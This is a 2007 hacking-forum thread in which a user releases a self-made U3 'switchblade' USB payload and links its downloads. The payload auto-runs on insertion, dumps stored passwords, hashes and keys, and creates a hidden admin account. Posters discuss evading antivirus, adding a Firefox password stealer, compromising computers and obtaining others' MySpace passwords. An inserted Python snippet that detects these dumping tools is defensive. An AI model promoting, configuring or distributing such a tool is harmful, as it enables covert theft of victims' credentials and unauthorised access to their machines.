Obi-Wahn Posted July 18, 2007

Hello everybody! Today, I'll release my self-coded switchblade. It's a complete package, including all tools needed.

Download U3P Package: http://www.autohotkey.net/~Obi-Wahn/hak5/m...Switchblade.u3p
Download Non-U3 Package with .exe: http://www.autohotkey.net/~Obi-Wahn/hak5/m...e_exe_nonu3.zip
Download Non-U3 Package with .bat: http://www.autohotkey.net/~Obi-Wahn/hak5/m...chblade_bat.zip
Download Manual (.pdf): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.pdf
Download Manual (.doc): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.doc

Info: The U3 package works fully. The non-U3 packages (.exe and .bat) also work, but they are "quick and dirty" coded. So (especially for the .bat package) the downloader may want to check the source code again. I've only written this because not everyone wants to learn AHK or is able to "understand" AHK. Post bugs and errors here, send a PM or a mail. And feedback would be nice.

Regards
Obi-Wahn

EDIT: Sorry, I had to hurry up yesterday. My U3 Switchblade is written in AutoHotkey, which is similar to Auto-IT. How to install and configure this tool is in the manual.

It is possible to:
- Dump system information (including computer name, username, admin state of the user, systemroot, application, common application and Comspec paths, operating system, language and screen resolution, including a network information dump, all in one file)
- Stop any kind of process
- Copy the clipboard to a file
- Dump passwords from the Protected Storage
- Dump network passwords
- Dump Messenger passwords
- Dump mail passwords
- Dump the history of IE
- Dump and decrypt passwords of Opera's wand file (if it exists; works at least up to version 9.10)
- Dump product keys
- Dump user password hashes
- Dump dial-up passwords
- Dump IE passwords
- Dump wireless passwords
- Dump SID
- Dump a list of installed software, including hotfixes
- Dump a list of services
- Dump a list of TCP connections
- Dump and decrypt the ASP.Net account password
- Create a new, administrative user (username and password stored in the .ini), including German and English language support for the success report
- Start additional programs, stored in the .ini, including optional hidden starting
- Try to restart the terminated processes after finishing

Furthermore, it is possible to add computers (in combination with the username) to a "watchlist". If the computer with the current user is in the list, the program will exit without dumping any data.

It's possible to use the .exe without any other stuff to use the process-terminate routine, the process-restart routine, the sysinfo and the user creation as a standalone tool (the .ini is needed). For standalone usage, read the manual or type "switchblade.exe /?"

Developers are also welcome. Type "switchblade.exe /Src" to append the source code to a file or -if you use the u3p package- hold CTRL down while starting the Switchblade. Then it will append the source code to a file and exit the program. All tools are included.

elmer Posted July 18, 2007

Hmm... I think .u3p can only work with a stock U3 drive. I guess that I will have to find the restore .exe. Does this run automatically, or do you have to click a button? I haven't grabbed the manuals yet, so those will help. What does it do?

Obi-Wahn Posted July 19, 2007

Sorry. I had to hurry up yesterday. However, usage added @ first post.

Yes, the .u3p package has to be used with a stock U3 drive (which I use). After installation of the U3 package, you have to go to the manage programs dialog and activate "start on insertion" for the switchblade. Then (without terminating and restarting processes) it takes about 45 seconds, depending on the computer, to dump all information. I've configured my switchblade not to kill and restart processes. I've only added this feature in case e.g. a scanner detects a tool as a virus, but scanned with Avast, AVG and Norton, nothing happened.

elmer Posted July 19, 2007

So, anyone have a link to the way to revert my USB drive to normal U3? Also, did you write absolutely all of it?

Obi-Wahn Posted July 21, 2007

Maybe THIS will work. And yes, I wrote the complete switchblade (.exe / .bat, manifest file, processlist) and created the icon, based on the Switchblade logo from the wiki and the HAK5 logo.

elmer Posted July 22, 2007

Well, I just downloaded the LPInstaller.exe and I am backing up my thumb drive, so soon I will be able to test this. In the meantime, I downloaded the bat version and have to say that the code looks great. This is a really great payload.

EDIT: Yay! I installed it! I have a few questions for you: How do you configure what your computer is in the u3p package? By "Start on insertion," do you mean this: [image]

Obi-Wahn Posted July 23, 2007

After installation of the package, you have to start the switchblade on your computer. It'll create a hidden directory "Switchblade" on the writeable partition. There are two files in it: a processlist and a .ini file. In the .ini file, there's a section called Mycomputers. There you can add computers / users to ignore by adding lines like "index=Computername_username". On startup, it checks the section and if it's plugged into a system with the correct Computer_Username combination, it'll exit.

Example:

    [MYCOMPUTERS]
    # If you want to add more Computer-User combinations
    # Write in every line a Array of numbers. Eg:
    # 1=Computername_Username
    # 2=...
    # ...
    1=OBI-WAHN_Andreas
    2=ANDREAS_Obi-Wahn

This is my configuration. The #1 entry is filled in by starting the package the first time, so you have to plug it into your computer while starting.

Yes. I mean this dialog.

darkjoker Posted July 26, 2007

ty Obi-Wahn, I love the program. I haven't been able to find a good U3 switchblade yet until yours, so ty and keep up the good work.

elmer Posted July 26, 2007

Thanks, Obi-Wahn. I never had noticed the .ini file. It's all configured now, all I need to do is compromise some computers. :twisted: By the way, they have a ninja smiley on these boards! :ninja: It's so awesome.

Charlie123 Posted July 27, 2007

Congrats, it's an excellent prog! Is there a way to script in to retrieve a user's myspace pw also? lol 8)

setzer1411 Posted July 27, 2007

So none of the AVs pick this one up as of yet? Even if u have it pull all the passwords? Also, would it be possible to add a Firefox Password Puller?

Obi-Wahn Posted July 27, 2007

@Charlie: Believe it or not, I wasn't ever on myspace, so maybe your post is a joke (because of the "lol") or not. If not, show me a tool, and I'll try it.

@setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (according to ZA Firewall). And I've added a FF password reader, which works on a test installation of FF on my machine. Setting in the .ini file: Section "DUMP", Key "FFPasswords"

elmer Posted July 27, 2007

I just tested it on a computer with a fully updated version of Clamwin, and it worked seemingly perfectly.

GonZor Posted July 27, 2007

> So none of the AVs pick this one up as of yet? Even if u have it pull all the passwords? Also, would it be possible to add a Firefox Password Puller?

> @setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (according to ZA Firewall). And I've added a FF password reader, which works on a test installation of FF on my machine. Setting in the .ini file: Section "DUMP", Key "FFPasswords"

NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (e.g. mailpv.exe)

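
A defender-side view of what the posts above imply, added here as an example and not written by anyone in the thread: per-file AV coverage of these utilities varies, but several of them starting on one host within the roughly 45-second run described earlier is a behavioural signal. The event format, host names, the 60-second window and the two-tool threshold are assumptions; the three image names are the ones named in the post above.

```python
from datetime import datetime, timedelta
from ntpath import basename  # Windows path semantics on any OS

# Image names taken from the thread (the tools NOD32 flagged); extend as needed.
WATCHED = {"dialupass.exe", "pspv.exe", "mailpv.exe"}
WINDOW = timedelta(seconds=60)   # assumption: covers the ~45 s run mentioned in the thread
MIN_DISTINCT = 2                 # assumption: two different tools in one window is a burst

# Constructed sample process-creation events: "timestamp|host|image path".
SAMPLE_EVENTS = """\
2007-07-27T10:00:01|WS-014|C:\\Windows\\System32\\notepad.exe
2007-07-27T10:00:05|WS-014|F:\\tools\\pspv.exe
2007-07-27T10:00:19|WS-014|F:\\tools\\MailPV.exe
2007-07-27T10:00:40|WS-014|F:\\tools\\dialupass.exe
2007-07-27T11:30:00|WS-022|C:\\Admin\\pspv.exe
2007-07-27T14:10:00|WS-022|C:\\Admin\\mailpv.exe
"""

def parse(text):
    """Yield (time, host, lowercase image name, full path) per non-empty line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, path = line.split("|", 2)
        yield datetime.fromisoformat(ts), host, basename(path).lower(), path

def find_bursts(text):
    """Return one alert per host where >= MIN_DISTINCT watched tools start within WINDOW."""
    recent = {}   # host -> watched launches still inside the window
    alerts = {}
    for ts, host, name, path in sorted(parse(text)):
        if name not in WATCHED:
            continue
        hits = [h for h in recent.get(host, []) if ts - h[0] <= WINDOW]
        hits.append((ts, name, path))
        recent[host] = hits
        tools = sorted({h[1] for h in hits})
        if len(tools) >= MIN_DISTINCT:
            alerts[host] = {"host": host, "first_seen": hits[0][0],
                            "tools": tools, "paths": [h[2] for h in hits]}
    return list(alerts.values())

if __name__ == "__main__":
    for alert in find_bursts(SAMPLE_EVENTS):
        print(alert["host"], alert["first_seen"].isoformat(), ", ".join(alert["tools"]))
```

The two launches on WS-022 are hours apart and do not alert, which is the point of correlating on the window rather than on a single file name.
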
Charlie123 Posted July 27, 2007

I was just wondering (i.e. myspace pw). Your Switchblade seems to retrieve everything else :P ... I'm still looking to see if there is a cookie stored for it or not... If not, then keylogger is pretty much the only way I guess... :?

elmer Posted July 28, 2007

Wow, you're really adamant about getting MySpace passwords. MySpace is no different than any other website, that is, technologically. I don't think I will extol the "virtues" of MySpace at this point in time. But, back to what I was talking about. If the user has the password set to auto fill, LSA Secrets, IE Password, DeWand (UnWand?), or Firefox Password should grab it.

Charlie123 Posted July 29, 2007

@elmer... Just keeping "My" kids on the straight and narrow!!! They both have accounts there... Thanks for the info!!

darkjoker Posted July 29, 2007

Where does it dump all the info to? I can't find it.

Edit: never mind, I found it.

Obi-Wahn Posted July 30, 2007

I found a big bug in my switchblade. On one system, Switchblade hangs when Ignoremycomputers=Yes. I'll fix it and upload it asap.

Skunkfoot Posted August 19, 2007

I just tried this one out dude, and I gotta say, very nice job! :D I did run into a little problem though. See, I was testing this on my other laptop, so when I ran the file the first time, it recorded my comp's name, and since it's set to skip over your own comp without dumping anything, the first 3 times I tried it, I didn't get any output. Then I realized that I'm a moron and edited that option, and it worked great :D

RedRaven Posted August 22, 2007

Nice one, except for Windows 2000 operating systems :) When I inserted the device in a clean Win2K box, a 'no disk' error was returned. Seems to be a problem in a lot of SwitchBlades :D

jinster364 Posted September 21, 2007

I installed the U3 version of this. When I first opened it, it said is this the first time using this program or w/e. I clicked yes. Then nothing happened. I thought there was supposed to be like an int file and config file so I can like change the options, but I dunno where it is. It's not on the flash drive.

darkjoker Posted September 22, 2007

> I installed the U3 version of this. When I first opened it, it said is this the first time using this program or w/e. I clicked yes. Then nothing happened. I thought there was supposed to be like an int file and config file so I can like change the options, but I dunno where it is. It's not on the flash drive.

The part where you click yes is so that it doesn't steal passwords on ur computer. To get to the config, u go to the spot the documents part is and set ur computer to show hidden files, and there should be a file there that says dump. Right click it and tell it to open it with Notepad, and there is the config u can change. Make sure u don't go into the document folder; go to where u see where it says documents.

Skunkfoot Posted October 22, 2007

Hey Obi, I really like the way you made this thing so that it can be added to the LP on my U3, but I ran into a bit of a problem. See, I wanted to add the USB HackSaw to that Switchblade you made, but I can't "just add Hacksaw to your existing Switchblade by copying the SBS folder inside the CMD folder and add the go.cmd to your current go.cmd." because there's no SBS or CMD folders. Do you think you could make a version of the USB HackSaw that's similar to your version of the USB Switchblade? Cause that would be awesome... thanks in advance

--Skunkfoot

RadarG Posted October 22, 2007

I do have a couple of questions.

1. Is the package installed to the non-writable portion of the U3 drive?
2. If an AV picks anything up, will it destroy the files or prevent them from running?

Also, in the folder where the dump is located I see a bunch of ff_passwordsXX.txt files. When I open up these files I see an error. What is this error?

    Initialization failed , Make sure key3.db and cert8.db files are present in the specified directory
